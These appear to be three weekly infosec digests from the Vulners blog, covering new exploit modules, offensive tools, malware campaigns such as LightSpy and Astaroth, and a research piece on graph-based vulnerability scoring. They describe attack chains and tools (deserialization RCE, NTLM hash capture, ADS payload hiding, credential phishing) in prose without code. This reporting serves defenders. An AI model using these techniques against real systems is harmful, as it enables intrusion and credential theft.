Vulners weekly digest #3

Weekly overview of new vulnerabilities, exploits, tools and other news from the world of information security.

Vulners has officially integrated with EXPLOITPACK on this week. Now customers can get even more information centrally about the required vulnerabilities

All interest in the difference 🙂


Exploits

undefined

Congratulations, this week there was an exloit for CVE-2020-0796. We wrote about this vulnerability in our previous digest:

Let’s start patching and test exploits (in own labs or for detecting purposes 🙂 )

DotNetNuke

A new module for DotNetNuke (versions 5.0.0 to 9.3.0-RC) was recently added in metasploit. Vulnerable versions store user profile information in the DNNPersonalization cookie in XML format. The expected structure includes the “type” attribute to sprcify the server which type of object to create during deserialization. It happens if the DNN is configured to handle 404 errors with its built-in error page (default configuration). Attacker can use this vulnerability for remote code execution on the target system.

https://vulners.com/zdt/1337DAY-ID-34183

Redis Replication Code Execution

Vulners sets own AI score for many exploits and vulnerabilities. Thus, exploit for Redis has gained a fairly high rating and becomes more popular due to a new bug fix. Extended functionality added after Redis 4.0.0 for executing arbitrary code has become vulnerable. To transmit the given extension it makes use of the feature of Redis which called replication between master and slave.

https://vulners.com/zdt/1337DAY-ID-34165

More research about Vulners AI score: https://vulners.blog/2020/04/02/hidden-threat-vulnerability-analysis-using-the-news-graph


INFOSEC TOOLS

JACKDAW

This tool help you help to collect information about domain, store it in a SQL database and show graph. It gain a better understanding of Active Directory objects interact with each-other . Main features:

  • Data acquisition;
  • Graph building;
  • Anomlaies detection

Webkiller v2.0

Simple tool for gathering infomation. If you don’t like to understand large and intricate OSINT frameworks, you will like this tool .

Pulsar 

Pulsar is an automated framework with GUI for Red teams, pentesters and Bounty Hunters. If you like to know about full-scale and holistic tools, it will fascinate you for a long time and can become a permanent tool. This framework integrated several projects:

The full structure of the project:

SauronEye

Simple search tool to find files containing specific keywords. Main features:


ZOOM and MITRE

If coronavirus is the number one topic in IT news, then ZOOM has definitely taken the second place in recent days.

The ZOOM client, when sending a URL to an internal chat, converts it into a hyperlink. However, along with this, it also converts the UNC paths that Windows uses to access network resources to hyperlinks.

When you click on such a hyperlink, Windows uses the SMB protocol and transfers the username and NTLM hash of the user’s password to the other side. The latter can be easily opened taking into account modern computing power.

Thus, an attacker, having sent a specially formed link to the application’s internal chat, can subsequently obtain a user login and password. In addition, a command to start a local application can be sent in UNC format. True, in this case, Windows will ask permission to run.

More detailed: https://vulners.com/thn/THN:679E49F88578E2E63101319B5AB7DAAC

Based on low AI score of news about ZOOM vulnerabilities, we can conclude that most of them are hype and do not make much sense:

One of the most important events for all who try to detect APT attacks and analyse endpoint logs – MITRE Sub-Techniques (beta). The current one is still the October 2019 version.

The version of ATT&CK with sub-techniques is only in beta right now to allow enough time for feedback and for organizations to determine how to transition. We are expecting to make we make it the official version sometime in July 2020.

One good example of demonstrating the benefits of sub-techniques is T1003. The name was changed slightly to OS Credential Dumping and the technique kept:

Technique T1003
Sub-techniques of this techniques

The added granularity will allow you to represent different types of credential dumping that can happen at a more detailed level than just mapping to the broader OS Credential Dumping. MITRE’re asking for feedback on technique and sub-technique pairings as well as any additional techniques or sub-technique ideas that help organize remaining techniques without sub-techniques.

More detailed info in MITRE blog: https://medium.com/mitre-attack/attack-subs-what-you-need-to-know-99bce414ae0b

Attack matrix for Kubernetes

On this week, Microsoft crafted an ATT&CK-like matrix comprising the major techniques that are relevant to container orchestration security, with focus on Kubernetes:

Understanding the attack surface of containerized environments is the first step of building security solutions for these environments. This matrix can help organizations identify the current gaps in their defenses coverage against the different threats that target Kubernetes.

https://vulners.com/mssecure/MSSECURE:B88202FB5B97F91B4C2853079E60CFF1

Hidden Threat – Vulnerability Analysis using the news graph

When you face to face a new vulnerability, what is the thought that comes first? Of course, respond as quickly as possible. However, speed is just one of the conditions for an effective fight against information security threats. When it comes to corporate security, it is equally important to determine without error what you should respond to first. An underestimated threat can cause serious damage or loss of reputation. But if the count of vulnerabilities is constantly growing, can you quickly assess their significance and not miss crucial details?

Vulnerability dynamics by CVSS group (source – vulners.com)

The CVSS Score (Common Vulnerability Scoring System) scale is typically used to rank vulnerabilities by various criteria, ranging from operational complexity to harm and other parameters.

It would seem why invent something else – but the CVSS Score has one weak point – it is based on expert evaluations not supported by real statistics. It would be much more effective to offer experts cases that were already selected according to certain quantitative criteria and make decisions based on verified data – but where to get this data and what to do next? It sounds like an unusual and interesting task for a data scientist – this challenge inspired Lydia Khramova and the Vulners team to create a new concept for assessing and classifying vulnerabilities based on a graph of related information.

Why graphs? In the case of social networks and the media, graph methods have been successfully used for a long time for various purposes: from analyzing the distribution of content in the news stream, to notes on the impact of top authors on the opinion of readers and clustering social network by interests. Any vulnerability can be presented as a graph containing data – news about changes in software or hardware and the effects caused by them.

About data

Lydia did not have to manually collect news about each update, all the necessary texts were found in the vulners.com open vulnerability database. Visually, the data is as follows:

Each vulnerability, in addition to its name, publication date and description, has a family (NVD, scanner, exploit, etc.) already assigned to it (cve, nessus, etc.), a CVSS rating (CVSS v2 is used hereinafter), and also links on related news.

If you present these links schematically as a graph, one vulnerability will look like this: an orange circle indicates the original or parent publication, black circles – news that can be clicked on while on the parent page, and gray circles – linked news, which can only be reached by going through all the publications marked with black circles. Each color of the circles is a new level of the graph of related information, from zero – the initial vulnerability, to the first, second and so on.

Of course, when viewing one news item, we know only the zero and the first level, therefore, to get all the data, we used the method of traversing the graph in depth, which allows you to unravel the tangle of news from the beginning to the most recent connected nodes (hereinafter – the graph node). At this stage, optimization problems accur – graph assembly over a long period took a long time and had to apply magic with both the script and the data structure. At this stage, optimization problems arose – building a graph over a long period took too much time and had to apply magic with both the script and the data structure. By the way, it was decided to pack the final data into parquet for further work with them using spark sql, which facilitated the initial analysis.

What does graph data look like? Visualization will help us best understand their nature. The figure shows a graph of the well-known, but not very dangerous vulnerability Heart bleeds (only 5 out of 10 points on the cvss scale).

Looking at this lush set of points from related news and exploits, where the red dot is the original vulnerability, we realize that Heartbleed was significantly underestimated.

Based on this example we can conclude that consistency, duration, and other vulnerability parameters are well evaluated using graph metrics. Below are a couple of examples of metrics from the study that served as the basis for an alternative classification:

  • the count of nodes in the graph – is responsible for the “breadth” of the vulnerability and its fingerprints left in various systems;
  • the count of subgraphs (large clusters of news) – is responsible for the granularity of the problem or the presence of large problem areas within the vulnerability;
  • the count of related exploits and patches – indicates the explosive nature of the news and how many times it had to be fixed;
  • the count of unique news types and families in the graph is about systemicity, i.e. the count of subsystems affected by the vulnerability;
  • the duration from the first publication to the first exploit, the time from the first publication to the last related news – about the temporal nature of the vulnerability, whether it stretches with a large tail of consequences or quickly develops and fades.

Not all metrics are described here, under the hood of the research now there are about 30 indicators that complement the basic set of CVSS criterias, including the average increase between the levels of the news vulnerability graph, the percentage of exploits at the first level of the graph, and much more.

open up gray zone

And now a bit of data science and statistics — hypotheses need to be confirmed on data, right?

For the experiment with an alternative scale and new metrics, news published in January 2019 were selected. This is 2403 newsletters and about 150 thousand lines in the news column. All source vulnerabilities were divided into three groups according to CVSS Score:

  • High – from 8 points inclusive;
  • Medium – from 6 incl. to 8 points;
  • Low – less than 6 points.

Let’s see correlation the CVSS score with the number of related news in the graph, the number of news types and the number of exploits:

In the perfect situation, we should have seen a clear division of metrics into three clusters, but it did not happen, which indicated the possible presence of a gray area that CVSS Score does not define – this is our goal.

The next step was clustering vulnerabilities into homogeneous groups and building a new scale.

For the first iteration, a simple metric classifier k-means was chosen and a new matrix of estimates was obtained: the initial points (Medium, Low, High) are found on the Y axis, along the X, where 2 are the highest in the new vulnerability metrics, 1 are the new vulnerabilities, 0 are the smallest.

An oval-marked zone (Vulnerability Class 2 with an initial low & medium rating) —Potentially underestimated vulnerabilities. The division into new classes also looks clearer, which is what we achieved:

However, simply trusting the model is a bad idea, especially when it comes to unsupervised clustering, where the correct answer is not known in principle, and you can only rely on the separation metrics of the resulting classes.

And it is where expert knowledge is required – for testing and interpretation of the results, knowledge of the subject area is necessary. Therefore, it is advisable to point-check the model, for example, by pulling out a pair of vulnerabilities for detailed analysis.

Below are a few cases from the gray zone that have a low CVSS score, but a high graph score – which means potentially requiring a different priority for working with them. Here’s what they look like in a graph representation:

CVE-2019-0555 (CVSS score 4.4, graph class 2 – high)

SMB_NT_MS19_JAN_DOTNET.NASL (CVSS score 5.0, graph class 2 – high)

CVE-2019-1653 (CVSS score 5.0, graph class 2 – high)

RHSA-2019: 0130 (CVSS score 5.0, graph class 2 – high)

As you can see, the concept was confirmed by statistics and point verification, so in the nearest future we want to finalize and automate the collection of graph metrics, and – possible – the classifier itself. Of course, there is still a lot of work to do – from collecting a large count of new graphs for months not covered by the study, but this only adds enthusiasm, as does the essence of the task. According to Lydia, a data scientist, that the work on this research was an incredibly inspiring experience, both in terms of topic and complexity – even preparation engineering work with loosely structured data was very interesting.

In conclusion

After the study, it became clear that, first of all, a critical approach is needed not only to any metric or data, but to the process as a whole, because the world is too dynamic and changes faster than methodologies and documentation. Always evaluated in one way – why not try to shift the angle of view? As our example shows, even the most unusual hypotheses can be confirmed.

An important role is played by the availability of data for data scientists – it allows you to quickly check the most daring hypotheses and better understand the essence of your subject area in all its manifestations. Therefore, if you are not yet collecting or deleting “unnecessary” data, think about it, maybe there are a lot of discoveries lurking there. This case suggests that data driven and information security complement each other perfectly.

Source: https://habr.com/ru/post/494332/

Author: Lydia Khramova (https://www.linkedin.com/in/lydia-khramova)

Vulners weekly digest #2

Weekly overview of new vulnerabilities, exploits, tools and other news from the world of information security


EXPLOITS and vulnerabilities

Microsoft continues to gather most of the hype about critical vulnerabilities.
On March 23rd Microsoft released a new warning about two new critical zero-day vulnerabilities that could allow attackers to remotely gain control over their target computers. Both vulnerabilities in the Windows Adobe Type Manager Library, a font parsing software that not only parses content in a 3rd-party software but also used by Explorer to display the content of a file in the ‘Preview Pane’ or ‘Details Pane’ without having users to open it.
25 March: According to Microsoft, for Windows 10, this vulnerability is low.
From all descriptions and reviews, we can conclude that the exploitation index is in reality quite low. But you should not wait for such information to appear in APT reports or in the public exploit database.

“Microsoft is aware of this vulnerability and working on a fix. Updates that address security vulnerabilities in Microsoft software are typically released on Update Tuesday, the second Tuesday of each month.”

Main description from Microsoft:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006

SharePoint

New metasploit module was added for CVE-2020-0646. This module allows an attacker to remote execution after sending crafted specially XOML data to SharePoint via the Workflows functionality.

https://vulners.com/zdt/1337DAY-ID-34152

OSX Privilege Escalation

Vulnerability was found for VMware Fusion (11.x before 11.5.2), VMware Remote Console for Mac (11.x and prior before 11.0.1) and Horizon Client for Mac (5.x and prior before 5.4.0). Explotation of this vulnerability may provide for attacker escalate from user normal privilages to root access on host. It is worth noting that exploits for OSX are quite rare and a new metasploit module is already on the way.

PoC: https://vulners.com/zdt/1337DAY-ID-34121
Forthcoming module: https://github.com/rapid7/metasploit-framework/pull/13123

There are also exploits without any public score or CVE number. Vulners platform collects, agregate information and specify own AI score, what is made up of various indicators. In this way, you can find a lot of information about unique vulnerabilities for which new exploits have been released (including paid ones). They were not mentioned in the news and no research has been done for them. Look at the examples below:

BustaBit

Bustabit is a real time and simple game where you can play for fun or to win money. Each round of the game, you have the opportunity to place a bet before the round starts. Every tick in the game has a chance to break. If you don’t cash out before bust, you will lose your bet.
This exploit will generate the next 10 game results after starting from your . The author of the paid exploit provides video POC of this functional.

https://vulners.com/zdt/1337DAY-ID-34134

360 Security sandbox escape

A lot of security vendors provide their own sanboxes. Sanbox is good way for test malicious samples in isolate environment. Application running in sandbox have limented access without network communications, creating files and etc. Vulnerability in 360 security sanbox bypass main sandbox features and allow an attackers to escape from the sanbox, call other programs or another instance of itself outside the sandbox.

https://vulners.com/zdt/1337DAY-ID-34125


INFOSEC TOOLS

Starkiller

Empire one of the most famous pentest framework. Starkiller is a frontend for PowerShell Empire written in VueJS. It is a nice addition to Empire tool.

uDork – Google Hacking Tool

uDork is a script written on Python that uses advanced Google search methods. This RECON tool use open lists from exploit-db.com (Google Hacking Database: https://www.exploit-db.com/google-hacking-database)

Ninja c2

Open source C2 server created by Purple team for Purple team. That’s especially relevant for test your correlation rules and threat hunting techniques. Ninja still in beta version and when the stable version released it will contains many more stealthy techinques and anti-forensic methods.

Usefull C2 matrix: https://www.thec2matrix.com/matrix


attacking News

Spyware On iPhones

A newly water hole campaign was discovered on January 10, 2020 utilizing a full remote iOS exploit chain to deploy a feature-rich implant named LightSpy. The campaign posted malicius links on multiple forums, clickbait news from websites or about pandemic/COVID-19.
The malware exploit a “silently patched” Safari vulnerability, which when rendered on the browser to the exploitation of a use after free memory flaw (tracked as CVE-2019-8605) that allows an attacker to code execution with root privileges — install the proprietary LightSpy backdoor. The bug has since been resolved with the release of iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, and watchOS 5.2.1.

By analyzing the changes in the firstly stages WebKit exploit, kaspersky discovered the list of supported devices was also significantly extended.

The most completely scheme from Trend Micro of described activity:

In addition, LightSpy targets messaging applications like Telegram, QQ, and WeChat to steal account information, contacts, groups, messages, and attached files.

Astaroth come back

Astaroth is malicious software for stealing information that came back in early February with a lot of changes in its functionality. It uses multiple fileless techniques and abuses defferent legitimate processes to attempt running undetected on compromised machines.
Microsoft Defender ATP data showing revival of Astaroth campaigns:

Astaroth now completely avoids the use of WMIC and related techniques to bypass existing detection methods. The attackers introduced new techniques that make the attack chain stealthier:

  • Abusing Alternate Data Streams (ADS) to hide malicious payloads
  • Abusing the legitimate process ExtExport.exe, a highly uncommon attack vector, to load the payload

One of the most significant updates is the use of Alternate Data Stream (ADS), which Astaroth abuses at several stages to perform various activities. ADS is a file attribute that allows a user to attach data to an existing file. The stream data and its size are not visible in File Explorer, so attacks abuse this feature to hide malicious code in plain sight.
More practical description in the research.

  1. Arrival: Spearfishing with lnk file. When clicked, the LNK file runs an obfuscated BAT cmd. The BAT drops a single-line JavaScript to the Pictures folder and invokes explorer.exe to run the JavaScript fileundefined The dropped one-liner script uses the GetObject technique to fetch and run the much larger main JavaScript directly in memory: undefined
  2. BITSAdmin abuse: The main script uses BITSadmin for download additional binaries from cammand-and-control (C2) serverundefined
  3. Alternate Data Streams abuse: Astaroth uses advanced technique for copying downloaded data in data streams. For each download, the content is copied to the ADS, and then the original content is deletedundefined
  4. ExtExport.exe abuse: The script uses another unobvious technique from the LOLBAS-project: ExtExport.exe; undefined
  5. Userinit.exe abuse;
  6. Astaroth payload: While running, the Astaroth payload reads and decrypts more components from the ADS stream of desktop.ini.

Some of payload components are credential-stealing plugins hidden inside the ADS stream of desktop.ini. Astaroth abuses these plugins to steal information from compromised systems:

  • NirSoft’s MailPassView – an email client password recovery tool
  • NirSoft’s WebBrowserPassView – a web browser password recovery tool

Nirsoft features are well-known to many threat hunters. If you have not already done so, be sure to test and explore the capabilities of nirsoft.
Astaroth attempts to detect installed security products and then tries to disable found security products.

Vulners weekly digest #1

Brief overview of new exploits, tools and various news from the world of information security


Exploits

This month’s most famous vulnerability is CVE-2020–0796, a critical SMB server/client vulnerability that affects Windows 10. A working exploit is still missing, but it already has everything needed to fix it. After auth, an attacker can exploit this vulnerability to cause memory corruption, which may lead to remote code execution.
Since 2017, despite millions of dollars in losses and a ransomware epidemic, attempts to exploit the vulnerabilities of MS17–010 in SMB protocols have continued.
It is recommended to start patching your infrastructure, not to postpone it until the working exploit appears and apply the latest patch from Microsoft for CVE-2020–0796 for Windows 10.

Checker: 
https://vulners.com/zdt/1337DAY-ID-34097
More detailed description:
https://www.kaspersky.com/blog/smb-311-vulnerability/33991/

rConfid 3.x exploit for CVE-2020–10220 and CVE-2019–19509 was added in metasploit.
Firstly, this module use CVE-2020–10220 to add admin user to the application via exploiting SQL injection.
Secondly, the module authenticates as the newly created admin user to abuse a command injection in the `path` parameter of the ajaxArchiveFiles within the rConfig web interface via CVE-2019–19509.

https://vulners.com/exploitdb/EDB-ID:48223

RCE in Microsoft SQL Server Reporting Services (CVE-2020–0618)
Enables the attacker to craft a HTTP POST request with a serialized object to achieve remote code execution. An account is necessary to exolit this vulnerability. The request is using NTLM basic authentication. This account must be assigned at least the “Browser” role on the site. It is low privilege available and simply allows the user to do few things: view folders, reports and subscribe to reports.

https://vulners.com/zdt/1337DAY-ID-34090


InfoSec tools

Pypykatz:

Each blue team has been heard about such tool as mimikatz. Pypykatz is mimikatz implementation in pure Python. Can be run on all OS’s which support python>=3.6 
Also, it’s actively developing open source tool, which you should test.

Fresh tool for phishing creds:

Pickl3 is Windows active user credential phishing tool. This tool can be integrated with all classic up-to-date phishing techniques: lnk files, dde attacks or macros in microsoft office documents.

OWASP Maryam:

New open-source OSINT tool for red teamers. If you have experience with recon-ng, it will be easy use without prerequisites.


COVID-19 and malware activity

The coronavirus pandemic situation has proven to be a blessing in disguise for APT groups and attackers. Now, according a report published by Check Point Research hackers are exploiting the COVID-19 outbreak to spread their own infections, including registering malicious COVID-19-related domains and selling for malware creators in the dark web.
The report comes following in the number of malicious coronavirus-related domains that have been registered since the start of January:

It’s amply clear that these attacks exploit coronavirus fears and people’s hunger for information about the pandemic. It’s very important to avoid falling victim to online scams and practice your digital hygiene.
https://vulners.com/thn/THN:388DC5BD3433ABFAA4F3ADE1B130DB21

The Trickbot has added a new functional. A module for bruteforce remote desktop protocol (RDP) was calles rdpScanDll. TrickBot is a malware that has been around since 2016, starting career as a banking trojan. 
The malware is distributed through spam mailing lists, uses new security evasion methods and acts as a means of delivering other malware such as Emotet.
More detailed information about new malware features:
https://vulners.com/thn/THN:71376C31FA1999B14811937997E9339A
Trickbot has also been spotted in the latest trend in attacks using sites about COVID-19 or cronovirus, which described in fortinet report.

Vulnerability Management with Vulners Agents

Vulners Team have recently released a new functionality for Linux vulnerability audit – Agent Scans. It’s not an API that you have to use somehow in your own scripts, but a complete enterprise ready product.

IP Summary

Try it for free! To audit CentOS 7 with Vulners Agents server you need to make this steps:

  1. Add Vulners repostory repository. Create /etc/yum.repos.d/vulners.repo file:
    [vulners]
    name=Vulners Agent
    baseurl=https://repo.vulners.com/redhat/el$releasever/
    enabled=1
    gpgcheck=0
  2. Install Vulners agent
    yum install vulners-agent.noarch
  3. Get an API key

    You will get key like “HXKM3OMDIYGJLJ60MPM1X51AKC3XTD9Z28J78X12T2OC2MXSTKMMBN70EBBIQUAA”

  4. Add key to /opt/vulners/conf/vulners.conf
  5. Wait for two hours or run /opt/vulners/agent.py manually
  6. Go to https://vulners.com/audit and see the results:

Continue reading “Vulnerability Management with Vulners Agents”